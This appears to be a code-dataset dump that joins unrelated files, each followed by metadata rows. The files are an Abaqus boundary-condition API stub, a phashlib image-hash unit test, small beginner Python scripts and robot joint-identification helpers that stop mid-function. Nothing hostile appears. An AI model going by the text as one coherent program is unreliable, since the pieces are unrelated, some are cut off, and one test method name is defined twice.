# condition. The *fieldName* argument applies only when *distributionType*=FIELD. The
# default value is an empty string.
fieldName: str = ''
# A SymbolicConstant specifying the category of the boundary condition. Possible values
# are MECHANICAL and THERMAL.
category: SymbolicConstant = None
# A Region object specifying the region to which the boundary condition is applied.
region: Region = Region()
# None or a DatumCsys object specifying the local coordinate system of the boundary
# condition's degrees of freedom. If *localCsys*=None, the degrees of freedom are defined
# in the global coordinate system. The default value is None.
localCsys: str = None
def __init__(self, name: str, createStepName: str, region: Region, fieldName: str = '',
magnitude: float = 0, distributionType: SymbolicConstant = UNIFORM,
amplitude: str = UNSET, fixed: Boolean = OFF):
"""This method creates a PorePressureBC object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].PorePressureBC
Parameters
----------
name
A String specifying the boundary condition repository key.
createStepName
A String specifying the name of the step in which the boundary condition is created.
region
A Region object specifying the region to which the boundary condition is applied.
fieldName
A String specifying the name of the AnalyticalField object associated with this boundary
condition. The *fieldName* argument applies only when *distributionType*=FIELD. The
default value is an empty string.
magnitude
A Float specifying the pore pressure magnitude. The default value is 0. The *magnitude*
argument is optional if *distributionType*=USER_DEFINED.
distributionType
A SymbolicConstant specifying how the boundary condition is distributed spatially.
Possible values are UNIFORM, USER_DEFINED, and FIELD. The default value is UNIFORM.
amplitude
A String or the SymbolicConstant UNSET specifying the name of the amplitude reference.
UNSET should be used if the boundary condition has no amplitude reference. The default
value is UNSET. You should provide the *amplitude* argument only if it is valid for the
specified step.
fixed
A Boolean specifying whether the boundary condition should remain fixed at the current
values at the start of the step. The default value is OFF.
Returns
-------
A PorePressureBC object.
"""
super().__init__()
pass
def setValues(self, fieldName: str = '', magnitude: float = 0, distributionType: SymbolicConstant = UNIFORM,
amplitude: str = UNSET, fixed: Boolean = OFF):
"""This method modifies the data for an existing PorePressureBC object in the step where it
is created.
Parameters
----------
fieldName
A String specifying the name of the AnalyticalField object associated with this boundary
condition. The *fieldName* argument applies only when *distributionType*=FIELD. The
default value is an empty string.
magnitude
A Float specifying the pore pressure magnitude. The default value is 0. The *magnitude*
argument is optional if *distributionType*=USER_DEFINED.
distributionType
A SymbolicConstant specifying how the boundary condition is distributed spatially.
Possible values are UNIFORM, USER_DEFINED, and FIELD. The default value is UNIFORM.
amplitude
A String or the SymbolicConstant UNSET specifying the name of the amplitude reference.
UNSET should be used if the boundary condition has no amplitude reference. The default
value is UNSET. You should provide the *amplitude* argument only if it is valid for the
specified step.
fixed
A Boolean specifying whether the boundary condition should remain fixed at the current
values at the start of the step. The default value is OFF.
"""
pass
def setValuesInStep(self, stepName: str,
magnitude: typing.Union[SymbolicConstant, float] = UNCHANGED,
amplitude: str = ''):
"""This method modifies the propagating data for an existing PorePressureBC object in the
specified step.
Parameters
----------
stepName
A String specifying the name of the step in which the boundary condition is modified.
magnitude
A Float or the SymbolicConstant FREED specifying the pore pressure magnitude.
amplitude
A String or a SymbolicConstant specifying the name of the amplitude reference. Possible
values for the SymbolicConstant are UNCHANGED and FREED. UNCHANGED should be used if the
amplitude is propagated from the previous analysis step. FREED should be used if the
boundary condition is changed to have no amplitude reference. You should provide the
*amplitude* argument only if it is valid for the specified step.
"""
pass
| 47.159509
| 138
| 0.674906
| 895
| 7,687
| 5.781006
| 0.157542
| 0.085427
| 0.081175
| 0.052571
| 0.746424
| 0.735408
| 0.735408
| 0.703904
| 0.678005
| 0.657132
| 0
| 0.000719
| 0.276441
| 7,687
| 162
| 139
| 47.450617
| 0.929522
| 0.757643
| 0
| 0.217391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.130435
| false
| 0.130435
| 0.173913
| 0
| 0.608696
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
8a9610e1f482f863fe539251393fd992e51dfac4
| 9,246
|
py
|
Python
|
Tests/Test_HashFile.py
|
fake-name/phashlib
|
80acf8a8358452952782c120f063f767bf703196
|
[
"BSD-2-Clause"
] | null | null | null |
Tests/Test_HashFile.py
|
fake-name/phashlib
|
80acf8a8358452952782c120f063f767bf703196
|
[
"BSD-2-Clause"
] | null | null | null |
Tests/Test_HashFile.py
|
fake-name/phashlib
|
80acf8a8358452952782c120f063f767bf703196
|
[
"BSD-2-Clause"
] | null | null | null |
import unittest
import phashlib
import os.path
# Unit testing driven by lolcat images
# AS GOD INTENDED!
class TestSequenceFunctions(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def test_hashImage1(self):
cwd = os.path.dirname(os.path.realpath(__file__))
imPath = os.path.join(cwd, 'testimages', 'dangerous-to-go-alone.jpg')
with open(imPath, "rb") as fp:
fCont = fp.read()
basePath, intName = "LOL", "WAT.jpg"
fname, hexHash, pHash, imX, imY = phashlib.hashFile(basePath, intName, fCont)
self.assertEqual(intName, fname)
self.assertEqual(hexHash, "dcd6097eeac911efed3124374f44085b" )
self.assertEqual(pHash, -149413575039568585 )
self.assertEqual(imX, 325 )
self.assertEqual(imY, 307)
def test_hashImage2(self):
cwd = os.path.dirname(os.path.realpath(__file__))
imPath = os.path.join(cwd, 'testimages', 'Lolcat_this_is_mah_job.jpg')
with open(imPath, "rb") as fp:
fCont = fp.read()
basePath, intName = "LOL", "WAT.jpg"
fname, hexHash, pHash, imX, imY = phashlib.hashFile(basePath, intName, fCont)
self.assertEqual(intName, fname)
self.assertEqual(hexHash, "d9ceeb6b43c2d7d096532eabfa6cf482" )
self.assertEqual(pHash, 27427800275512429 )
self.assertEqual(imX, 493 )
self.assertEqual(imY, 389)
# check that phash is invariant across format changes
def test_hashImage2_b(self):
cwd = os.path.dirname(os.path.realpath(__file__))
imPath = os.path.join(cwd, 'testimages', 'Lolcat_this_is_mah_job.png')
with open(imPath, "rb") as fp:
fCont = fp.read()
basePath, intName = "LOL", "WAT.jpg"
fname, hexHash, pHash, imX, imY = phashlib.hashFile(basePath, intName, fCont)
self.assertEqual(intName, fname)
self.assertEqual(hexHash, "1268e704908cc39299d73d6caafc23a0" )
self.assertEqual(pHash, 27427800275512429 )
self.assertEqual(imX, 493 )
self.assertEqual(imY, 389)
# check that phash is invariant across size changes
def test_hashImage2_c(self):
cwd = os.path.dirname(os.path.realpath(__file__))
imPath = os.path.join(cwd, 'testimages', 'Lolcat_this_is_mah_job_small.jpg')
with open(imPath, "rb") as fp:
fCont = fp.read()
basePath, intName = "LOL", "WAT.jpg"
fname, hexHash, pHash, imX, imY = phashlib.hashFile(basePath, intName, fCont)
self.assertEqual(intName, fname)
self.assertEqual(hexHash, "40d39c436e14282dcda06e8aff367307" )
self.assertEqual(pHash, 27427800275512429 )
self.assertEqual(imX, 300 )
self.assertEqual(imY, 237)
def test_hashImage3(self):
cwd = os.path.dirname(os.path.realpath(__file__))
imPath = os.path.join(cwd, 'testimages', 'lolcat-crocs.jpg')
with open(imPath, "rb") as fp:
fCont = fp.read()
basePath, intName = "LOL", "WAT.jpg"
fname, hexHash, pHash, imX, imY = phashlib.hashFile(basePath, intName, fCont)
self.assertEqual(intName, fname)
self.assertEqual(hexHash, "6d0a977694630ac9d1d33a7f068e10f8" )
self.assertEqual(pHash, -5569898607211671279 )
self.assertEqual(imX, 500 )
self.assertEqual(imY, 363)
def test_hashImage4(self):
cwd = os.path.dirname(os.path.realpath(__file__))
imPath = os.path.join(cwd, 'testimages', 'lolcat-oregon-trail.jpg')
with open(imPath, "rb") as fp:
fCont = fp.read()
basePath, intName = "LOL", "WAT.jpg"
fname, hexHash, pHash, imX, imY = phashlib.hashFile(basePath, intName, fCont)
self.assertEqual(intName, fname)
self.assertEqual(hexHash, "7227289a017988b6bdcf61fd4761f6b9")
self.assertEqual(pHash, -4955310669995365332)
self.assertEqual(imX, 501)
self.assertEqual(imY, 356)
def test_hashImage5(self):
cwd = os.path.dirname(os.path.realpath(__file__))
imPath = os.path.join(cwd, 'testimages', 'lolcat-oregon-trail.jpg')
with open(imPath, "rb") as fp:
fCont = fp.read()
basePath, intName = "LOL", "WAT"
fname, hexHash, pHash, imX, imY = phashlib.hashFile(basePath, intName, fCont)
self.assertEqual(intName, fname)
self.assertEqual(hexHash, "7227289a017988b6bdcf61fd4761f6b9")
self.assertEqual(pHash, None)
self.assertEqual(imX, None)
self.assertEqual(imY, None)
def test_hashImage6(self):
cwd = os.path.dirname(os.path.realpath(__file__))
imPath = os.path.join(cwd, 'testimages', 'lolcat-oregon-trail.jpg')
with open(imPath, "rb") as fp:
fCont = fp.read()
basePath, intName = "LOL", "WAT.jpg"
fname, hexHash, pHash, imX, imY = phashlib.hashFile(basePath, intName, fCont, shouldPhash=False)
self.assertEqual(intName, fname)
self.assertEqual(hexHash, "7227289a017988b6bdcf61fd4761f6b9")
self.assertEqual(pHash, None)
self.assertEqual(imX, None)
self.assertEqual(imY, None)
def test_hashFile(self):
cwd = os.path.dirname(os.path.realpath(__file__))
imPath = os.path.join(cwd, 'testimages', 'lolcat-oregon-trail.jpg')
with open(imPath, "rb") as fp:
fCont = fp.read()
hexHash = phashlib.getMd5Hash(fCont)
self.assertEqual(hexHash, "7227289a017988b6bdcf61fd4761f6b9")
def test_hashImage6(self):
cwd = os.path.dirname(os.path.realpath(__file__))
images = [
(
'e61ec521-155d-4a3a-956d-2544d4367e02-ps.png',
{
'imY': 281,
'hexHash': 'b4c3d02411a34e1222972cc262a40b89',
'type': 'image/png',
'imX': 375,
# 'dHash': 5546533486212567551,
'pHash': -4230769653536099758
}
),
]
for imgname, expect in images:
imPath = os.path.join(cwd, 'testimages', imgname)
with open(imPath, "rb") as fp:
fCont = fp.read()
basePath, intName = "LOL", imgname
fname, hexHash, pHash, imX, imY = phashlib.hashFile(basePath, intName, fCont)
self.assertEqual(intName, fname)
self.assertEqual(hexHash, expect['hexHash'])
self.assertEqual(pHash, expect['pHash'])
self.assertEqual(imX, expect['imX'])
self.assertEqual(imY, expect['imY'])
def test_hashImage7(self):
cwd = os.path.dirname(os.path.realpath(__file__))
images = [
(
'funny-pictures-cat-looks-like-an-owl-ps.png',
{
'imY': 332,
'hexHash': '740555f4e730ab2c6c261be7d53a3156',
'type': 'image/png',
'imX': 369,
# 'dHash': -4629305759067799552,
'pHash': -93277392328150
}
),
]
for imgname, expect in images:
imPath = os.path.join(cwd, 'testimages', imgname)
with open(imPath, "rb") as fp:
fCont = fp.read()
basePath, intName = "LOL", imgname
fname, hexHash, pHash, imX, imY = phashlib.hashFile(basePath, intName, fCont)
self.assertEqual(intName, fname)
self.assertEqual(hexHash, expect['hexHash'])
self.assertEqual(pHash, expect['pHash'])
self.assertEqual(imX, expect['imX'])
self.assertEqual(imY, expect['imY'])
def test_hashImage8(self):
cwd = os.path.dirname(os.path.realpath(__file__))
images = [
(
'funny-pictures-cat-will-do-science-ps.png',
{
'imY': 506,
'hexHash': 'c47ed1cd79c4e7925b8015cb51bbab10',
'type': 'image/png',
'imX': 375,
# 'dHash': 1119025673978783491,
'pHash': -6361731780925024615
}
)
]
for imgname, expect in images:
imPath = os.path.join(cwd, 'testimages', imgname)
with open(imPath, "rb") as fp:
fCont = fp.read()
basePath, intName = "LOL", imgname
fname, hexHash, pHash, imX, imY = phashlib.hashFile(basePath, intName, fCont)
self.assertEqual(intName, fname)
self.assertEqual(hexHash, expect['hexHash'])
self.assertEqual(pHash, expect['pHash'])
self.assertEqual(imX, expect['imX'])
self.assertEqual(imY, expect['imY'])
def test_hashImage9(self):
cwd = os.path.dirname(os.path.realpath(__file__))
images = [
(
'funny-pictures-kitten-rules-a-tower-ps.png',
{
'imY': 281,
'hexHash': 'fb64248009dde8605a95b041b772544a',
'type': 'image/png',
'imX': 375,
# 'dHash': 9187567978625498130,
'pHash': -5860684349360469885
}
)
]
for imgname, expect in images:
imPath = os.path.join(cwd, 'testimages', imgname)
with open(imPath, "rb") as fp:
fCont = fp.read()
basePath, intName = "LOL", imgname
fname, hexHash, pHash, imX, imY = phashlib.hashFile(basePath, intName, fCont)
self.assertEqual(intName, fname)
self.assertEqual(hexHash, expect['hexHash'])
self.assertEqual(pHash, expect['pHash'])
self.assertEqual(imX, expect['imX'])
self.assertEqual(imY, expect['imY'])
def test_hashImage10(self):
cwd = os.path.dirname(os.path.realpath(__file__))
images = [
('superheroes-batman-superman-i-would-watch-the-hell-out-of-this.jpg',
{
'hexHash': '083e179ff11ccf90a0d514651c69c2ca',
'imX': 200,
'imY': 297,
'pHash': -8034280126218048380,
'type': 'image/jpeg'
}
)
]
for imgname, expect in images:
imPath = os.path.join(cwd, 'testimages', imgname)
with open(imPath, "rb") as fp:
fCont = fp.read()
basePath, intName = "LOL", imgname
fname, hexHash, pHash, imX, imY = phashlib.hashFile(basePath, intName, fCont)
self.assertEqual(intName, fname)
self.assertEqual(hexHash, expect['hexHash'])
self.assertEqual(pHash, expect['pHash'])
self.assertEqual(imX, expect['imX'])
self.assertEqual(imY, expect['imY'])
| 27.436202
| 98
| 0.673372
| 1,089
| 9,246
| 5.631772
| 0.150597
| 0.161422
| 0.020545
| 0.029676
| 0.760313
| 0.754443
| 0.743193
| 0.734225
| 0.734225
| 0.734225
| 0
| 0.088601
| 0.182133
| 9,246
| 336
| 99
| 27.517857
| 0.722428
| 0.029851
| 0
| 0.635193
| 0
| 0.004292
| 0.156808
| 0.098661
| 0
| 0
| 0
| 0
| 0.283262
| 1
| 0.064378
| false
| 0
| 0.012876
| 0
| 0.081545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a99e2ad978a63743a44abf83e674c334c36a2a0
| 145
|
py
|
Python
|
basics/dict.py
|
bobbybabra/codeGuild
|
0b49dbb6a0f113e1179e28fd36d59e7c327c7d31
|
[
"BSD-2-Clause"
] | null | null | null |
basics/dict.py
|
bobbybabra/codeGuild
|
0b49dbb6a0f113e1179e28fd36d59e7c327c7d31
|
[
"BSD-2-Clause"
] | null | null | null |
basics/dict.py
|
bobbybabra/codeGuild
|
0b49dbb6a0f113e1179e28fd36d59e7c327c7d31
|
[
"BSD-2-Clause"
] | null | null | null |
dictionary = {'name': 'chris'}
print dictionary['name']
dictionary['age'] = 31
print dictionary
# dictionaries are mutable #
#changing a line
| 14.5
| 30
| 0.710345
| 17
| 145
| 6.058824
| 0.705882
| 0.271845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01626
| 0.151724
| 145
| 9
| 31
| 16.111111
| 0.821138
| 0.275862
| 0
| 0
| 0
| 0
| 0.158416
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
76d4e21a672c3573785881b7083be7bfa2556c38
| 288
|
py
|
Python
|
python/exercicios mundo 1/ex006/ex002.py
|
LEXW3B/PYTHON
|
1ae54ea709c008bd7fab7602e034773610e7985e
|
[
"MIT"
] | 1
|
2022-01-05T08:51:16.000Z
|
2022-01-05T08:51:16.000Z
|
python/exercicios mundo 1/ex006/ex002.py
|
LEXW3B/PYTHON
|
1ae54ea709c008bd7fab7602e034773610e7985e
|
[
"MIT"
] | null | null | null |
python/exercicios mundo 1/ex006/ex002.py
|
LEXW3B/PYTHON
|
1ae54ea709c008bd7fab7602e034773610e7985e
|
[
"MIT"
] | null | null | null |
n1 = float(input('digite sua nota: '))
n2 = float(input('digite sua nota: '))
m = (n1 + n2) / 2
if m >=6.0:
print('sua média foi {:.1f}.'.format(m))
print('parabéns você PASSOU!!!')
else:
print('sua média foi {}.'.format(m))
print('REPROVADO! sem férias para você kkkkk')
| 28.8
| 50
| 0.597222
| 45
| 288
| 3.822222
| 0.577778
| 0.116279
| 0.186047
| 0.22093
| 0.267442
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034483
| 0.194444
| 288
| 9
| 51
| 32
| 0.706897
| 0
| 0
| 0
| 0
| 0
| 0.458333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.111111
| 0
| 0
| 0
| 0.444444
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
|
0
| 5
|
76e74ecc5621927b8df8cf4ccb8b8131a1dcd4e6
| 94
|
py
|
Python
|
mmdet3d/ops/furthest_point_sample/__init__.py
|
BOURSa/mmdetection3d
|
27d0001e873b3102a828a27e1372873fcf81ed7e
|
[
"Apache-2.0"
] | 12
|
2021-03-17T09:07:18.000Z
|
2022-01-21T01:37:42.000Z
|
mmdet3d/ops/furthest_point_sample/__init__.py
|
BOURSa/mmdetection3d
|
27d0001e873b3102a828a27e1372873fcf81ed7e
|
[
"Apache-2.0"
] | 1
|
2020-08-11T05:44:29.000Z
|
2020-08-11T05:44:29.000Z
|
mmdet3d/ops/furthest_point_sample/__init__.py
|
BOURSa/mmdetection3d
|
27d0001e873b3102a828a27e1372873fcf81ed7e
|
[
"Apache-2.0"
] | 2
|
2021-03-17T09:25:15.000Z
|
2021-04-22T09:15:58.000Z
|
from .furthest_point_sample import furthest_point_sample
__all__ = ['furthest_point_sample']
| 23.5
| 56
| 0.851064
| 12
| 94
| 5.833333
| 0.5
| 0.557143
| 0.814286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 94
| 3
| 57
| 31.333333
| 0.813953
| 0
| 0
| 0
| 0
| 0
| 0.223404
| 0.223404
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
0a09c3547d92d2e45602c69c41e62e403dd59493
| 107
|
py
|
Python
|
former/__init__.py
|
esvhd/former
|
9aca51b8f7a6f2abe2175293b895ed4af468e890
|
[
"MIT"
] | null | null | null |
former/__init__.py
|
esvhd/former
|
9aca51b8f7a6f2abe2175293b895ed4af468e890
|
[
"MIT"
] | null | null | null |
former/__init__.py
|
esvhd/former
|
9aca51b8f7a6f2abe2175293b895ed4af468e890
|
[
"MIT"
] | null | null | null |
from .modules import SelfAttention, TransformerBlock
from .transformers import GTransformer, CTransformer
| 26.75
| 52
| 0.859813
| 10
| 107
| 9.2
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102804
| 107
| 3
| 53
| 35.666667
| 0.958333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
0a1e15ae13ef8c1b7e443d813d6aa06089106646
| 13,739
|
py
|
Python
|
python/dynamic_graph/sot/torque_control/identification/identification_utils.py
|
jviereck/sot-torque-control
|
90409a656e5b5be4dd4ff937724154579861c20f
|
[
"BSD-2-Clause"
] | null | null | null |
python/dynamic_graph/sot/torque_control/identification/identification_utils.py
|
jviereck/sot-torque-control
|
90409a656e5b5be4dd4ff937724154579861c20f
|
[
"BSD-2-Clause"
] | null | null | null |
python/dynamic_graph/sot/torque_control/identification/identification_utils.py
|
jviereck/sot-torque-control
|
90409a656e5b5be4dd4ff937724154579861c20f
|
[
"BSD-2-Clause"
] | null | null | null |
import time
import sys
from subprocess import call
import numpy as np
jID = { "rhy" : 0,
"rhr" : 1,
"rhp" : 2,
"rk" : 3,
"rap" : 4,
"rar" : 5,
"lhy" : 6,
"lhr" : 7,
"lhp" : 8,
"lk" : 9,
"lap" : 10,
"lar" : 11,
"ty" : 12,
"tp" : 13,
"hy" : 14,
"hp" : 15,
"rsp" : 16,
"rsr" : 17,
"rsy" : 18,
"re" : 19,
"rwy" : 20,
"rwp" : 21,
"rh" : 22,
"lsp" : 23,
"lsr" : 24,
"lsy" : 25,
"le" : 26,
"lwy" : 27,
"lwp" : 28,
"lh" : 29 }
''' Solve the least square problem:
solve y=ax+b in L2 norm
'''
def solve1stOrderLeastSquare(x,y):
Q=np.vstack([np.ones(len(x)),x])
coef = solveLeastSquare(Q.T,y)
(a,b)=coef[1,0],coef[0,0]
return (a,b);
''' Solve the least square problem:
minimize || A*x-b ||^2
'''
def solveLeastSquare(A, b):
return np.linalg.pinv(A)*np.matrix(b).T;
''' Stop the joint when vel is low'''
def gentleStop(traj_gen,joint):
while(abs(traj_gen.dq.value[jID[joint]]) > 0.0001 ):
time.sleep(0.001)
traj_gen.stop(joint)
''' Do N cycles in cost vel or acc with speeds given by times (ex times=[5.0,4.0,3.0])'''
def doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode='constAcc'):
traj_gen.moveJoint(joint,min_pos,3.0)
time.sleep(3.5)
for T in times:
if mode== 'constAcc' :
traj_gen.startConstAcc(joint,max_pos,T)
elif mode== 'constVel':
traj_gen.startTriangle(joint,max_pos,T,0.3)
time.sleep(T*2*N - 1.0)
gentleStop(traj_gen,joint)
traj_gen.moveJoint(joint,min_pos,3.0)
time.sleep(3.5)
#(-0.785398, 0.523599); #// right hip yaw *****************************
def identify_rhy_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhp',-1.57,5.0)
time.sleep(5.0)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_rhy_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('rhy', -0.0, 0.5)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhr',0.1,3.0)
time.sleep(3.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-0.610865, 0.349066); #// right hip roll ****************************
def identify_rhr_static(traj_gen,staticTime=60.0):
(joint, min_pos, max_pos) = ('rhr', -0.5, 0.25)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhr',0.25,5.0)
time.sleep(5.0)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_rhr_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0,2.5]):
(joint, min_pos, max_pos) = ('rhr', -0.5, 0.25)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rsp',-1.57,5.0)
traj_gen.moveJoint('lsp',-1.57,5.0)
traj_gen.moveJoint('re',-1.57,5.0)
traj_gen.moveJoint('le',-1.57,5.0)
traj_gen.moveJoint('lhr',0.25,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-2.18166, 0.733038); #// right hip pitch ***************************:
def identify_rhp_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
time.sleep(5.0)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_rhp_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('rhp', -1.7, 0.6)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhr',-0.2,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-0.0349066, 2.61799); #// right knee ********************************
def identify_rk_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhp',-1.57,5.0)
traj_gen.moveJoint('rk',1.57,5.0)
time.sleep(5.0 + 0.5)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_rk_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('rk', 0., 2.5)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhp',-1.57,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-1.309, 0.733038); #// right ankle pitch *************************
def identify_rap_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhp',-1.57,5.0)
traj_gen.moveJoint('rk',1.57,5.0)
time.sleep(5.0 + 0.5)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_rap_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('rap', -1.2, 0.6)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhp',-1.57,5.0)
traj_gen.moveJoint('rk',1.57,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-0.349066, 0.610865); #// right ankle roll **************************
def identify_rar_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhp',-1.57,5.0)
traj_gen.moveJoint('rk',1.57,5.0)
time.sleep(5.0 + 0.5)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_rar_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('rar', -0.25, 0.5)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhp',-1.57,5.0)
traj_gen.moveJoint('rk',1.57,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-0.785398, 0.523599); #// left hip yaw *********************INVERTED
def identify_lhy_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lhp',-1.57,5.0)
time.sleep(5.0)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_lhy_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0]):
(joint, min_pos, max_pos) = ('lhy', +0.0, -0.5)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhr',-0.1,3.0)
time.sleep(3.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-0.610865, 0.349066); #// left hip roll ********************INVERTED
def identify_lhr_static(traj_gen,staticTime=60.0):
(joint, min_pos, max_pos) = ('lhr', +0.5, -0.25)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('rhr',-0.25,5.0)
time.sleep(5.0)
time.sleep(staticTime)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
def identify_lhr_dynamic(traj_gen,mode='constAcc',N=3,times=[5.0,4.0,3.0,2.5]):
(joint, min_pos, max_pos) = ('lhr', +0.5, -0.25)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
traj_gen.moveJoint('lsp',-1.57,5.0)
traj_gen.moveJoint('rsp',-1.57,5.0)
traj_gen.moveJoint('le',-1.57,5.0)
traj_gen.moveJoint('re',-1.57,5.0)
traj_gen.moveJoint('rhr',-0.25,5.0)
time.sleep(5.0 + 0.5)
doNCycles(traj_gen,joint,min_pos, max_pos,N,times,mode)
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
#(-2.18166, 0.733038); #// left hip pitch ***************************:
def identify_lhp_static(traj_gen,staticTime=60.0):
go_to_zero_position(traj_gen,5.0)
time.sleep(5.0 + 0.5)
